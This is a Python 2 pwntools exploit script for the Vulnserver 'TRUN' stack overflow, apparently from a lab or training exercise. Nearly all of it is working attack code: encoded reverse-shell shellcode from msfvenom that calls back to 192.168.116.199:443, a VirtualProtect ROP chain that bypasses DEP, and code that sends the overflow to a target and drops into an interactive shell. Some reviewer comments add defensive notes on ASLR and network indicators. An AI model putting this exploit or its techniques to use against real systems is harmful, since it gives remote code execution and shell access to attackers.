trun-dep-virtualprotect-rop-exploit.py
from pwn import *
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.199 LPORT=443 -b '\x00' -f python
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
# Vulnserver "TRUN" stack-overflow proof of concept with a DEP bypass: the
# overwritten return address is replaced by a ROP chain that calls
# VirtualProtect() (author's comment below) and then lands on a
# 'push esp # ret' gadget, so execution continues in the shellcode placed
# right after the chain. This is a Python 2 script (note the `print`
# statement near the bottom); the str/bytes concatenation below relies on
# Python 2 treating b"" and "" as the same type.
#
# Reviewer notes, defensive reading:
#  - Every gadget address below is a hard-coded ntdll.dll / msvcrt.dll
#    address, so the chain only works where those modules load at fixed
#    addresses; ASLR on the target invalidates it entirely.
#  - Observable behaviour on the target: a ~5 KB "TRUN /.:/AAAA..." command
#    on port 9999 followed by an outbound TCP connection from the vulnserver
#    process to 192.168.116.199:443 (the reverse shell configured in the
#    msfvenom command above).
#
# Shellcode: windows/shell_reverse_tcp as generated by the msfvenom command in
# the header comment (x86/shikata_ga_nai encoded, NUL byte excluded, 351 bytes).
buf = b""
buf += b"\x90" * 15  # short NOP sled in front of the encoded payload
buf += b"\xbb\xe1\x09\xdd\x95\xd9\xc3\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x23\x0d\x3f"
buf += b"\x60\x5f\xe6\x3d\x8b\x9f\xf7\x21\x05\x7a\xc6\x61\x71"
buf += b"\x0f\x79\x52\xf1\x5d\x76\x19\x57\x75\x0d\x6f\x70\x7a"
buf += b"\xa6\xda\xa6\xb5\x37\x76\x9a\xd4\xbb\x85\xcf\x36\x85"
buf += b"\x45\x02\x37\xc2\xb8\xef\x65\x9b\xb7\x42\x99\xa8\x82"
buf += b"\x5e\x12\xe2\x03\xe7\xc7\xb3\x22\xc6\x56\xcf\x7c\xc8"
buf += b"\x59\x1c\xf5\x41\x41\x41\x30\x1b\xfa\xb1\xce\x9a\x2a"
buf += b"\x88\x2f\x30\x13\x24\xc2\x48\x54\x83\x3d\x3f\xac\xf7"
buf += b"\xc0\x38\x6b\x85\x1e\xcc\x6f\x2d\xd4\x76\x4b\xcf\x39"
buf += b"\xe0\x18\xc3\xf6\x66\x46\xc0\x09\xaa\xfd\xfc\x82\x4d"
buf += b"\xd1\x74\xd0\x69\xf5\xdd\x82\x10\xac\xbb\x65\x2c\xae"
buf += b"\x63\xd9\x88\xa5\x8e\x0e\xa1\xe4\xc6\xe3\x88\x16\x17"
buf += b"\x6c\x9a\x65\x25\x33\x30\xe1\x05\xbc\x9e\xf6\x6a\x97"
buf += b"\x67\x68\x95\x18\x98\xa1\x52\x4c\xc8\xd9\x73\xed\x83"
buf += b"\x19\x7b\x38\x03\x49\xd3\x93\xe4\x39\x93\x43\x8d\x53"
buf += b"\x1c\xbb\xad\x5c\xf6\xd4\x44\xa7\x91\x1a\x30\xd3\xa6"
buf += b"\xf3\x43\x1b\x28\xbf\xcd\xfd\x40\xaf\x9b\x56\xfd\x56"
buf += b"\x86\x2c\x9c\x97\x1c\x49\x9e\x1c\x93\xae\x51\xd5\xde"
buf += b"\xbc\x06\x15\x95\x9e\x81\x2a\x03\xb6\x4e\xb8\xc8\x46"
buf += b"\x18\xa1\x46\x11\x4d\x17\x9f\xf7\x63\x0e\x09\xe5\x79"
buf += b"\xd6\x72\xad\xa5\x2b\x7c\x2c\x2b\x17\x5a\x3e\xf5\x98"
buf += b"\xe6\x6a\xa9\xce\xb0\xc4\x0f\xb9\x72\xbe\xd9\x16\xdd"
buf += b"\x56\x9f\x54\xde\x20\xa0\xb0\xa8\xcc\x11\x6d\xed\xf3"
buf += b"\x9e\xf9\xf9\x8c\xc2\x99\x06\x47\x47\xa9\x4c\xc5\xee"
buf += b"\x22\x09\x9c\xb2\x2e\xaa\x4b\xf0\x56\x29\x79\x89\xac"
buf += b"\x31\x08\x8c\xe9\xf5\xe1\xfc\x62\x90\x05\x52\x82\xb1"
#Disable DEP using VirtualProtect()
# ROP chain. The per-gadget comments are the author's; read together they
# describe the usual PUSHAD layout: the registers are loaded with the
# VirtualProtect() arguments and helper values, the address of the IAT entry
# for VirtualProtect() goes into EAX, PUSHAD writes all of them onto the stack
# as the call frame, and the final 'push esp # ret' gadget transfers control
# to the shellcode that follows the chain in `poc`.
virtualprotect = (
p32(0x7c90e862) + # XOR EAX,EAX # RETN ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
(
p32(0x7c97225e) + # ADD EAX,100 # POP EBP # RETN ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
p32(0x41414141) # JUNK - pop ebp
) * 5 +  # repeated five times: EAX ends at 0x500 (presumably the size argument - confirm)
p32(0x7c905980) + # INC EBX # RETN 0x00 ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
p32(0x7c9059c8) + # XCHG EAX,EBX # RETN ** [ntdll.dll] ** | {PAGE_EXECUTE_READ}
p32(0x77c35370) + # POP EBP # RETN [msvcrt.dll]
p32(0x77c35370) + # skip 4 bytes [msvcrt.dll]
p32(0x77c4debf) + # POP EAX # RETN [msvcrt.dll]
p32(0x2cfe04a7) + # put delta into eax (-> put 0x00000040 into edx)
p32(0x77c4eb80) + # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
p32(0x77c58fbc) + # XCHG EAX,EDX # RETN [msvcrt.dll]
p32(0x77c57b2e) + # POP ECX # RETN [msvcrt.dll]
p32(0x77c5ebcf) + # &Writable location [msvcrt.dll]
p32(0x77c47b17) + # POP EDI # RETN [msvcrt.dll]
p32(0x77c47a42) + # RETN (ROP NOP) [msvcrt.dll]
p32(0x77c39dd4) + # POP ESI # RETN [msvcrt.dll]
p32(0x77c2aacc) + # JMP [EAX] [msvcrt.dll]
p32(0x77c4debf) + # POP EAX # RETN [msvcrt.dll]
p32(0x77c11120) + # ptr to &VirtualProtect() [IAT msvcrt.dll]
p32(0x77c12df9) + # PUSHAD # RETN [msvcrt.dll]
p32(0x77c354b4) # ptr to 'push esp # ret ' [msvcrt.dll]
)
# Request layout: 9-byte command prefix, 2003 bytes of filler up to the
# overwritten return address (presumably; confirm against the crash offset),
# the ROP chain, the shellcode, then trailing filler to a fixed total length.
poc = "TRUN /.:/"
poc += "A" * ((2003 + 9)-len(poc))  # filler: total 2012 bytes so far
poc += virtualprotect  # chain starts at the saved return address
poc += buf  # shellcode directly after the chain, reached via 'push esp # ret'
poc += "C" * ((5000 + 9)-len(poc))  # pad the request to 5009 bytes in total
# Local listener for the reverse shell; the port matches LPORT=443 in the
# msfvenom command at the top of the file.
l = listen(443)
r = remote("192.168.116.178", 9999)  # the vulnserver target
print str(r.recvline())  # server banner (Python 2 print statement)
r.send(poc)
r.close()
l.recvline()  # waits for the callback connection and consumes its first line
l.interactive()
l.close()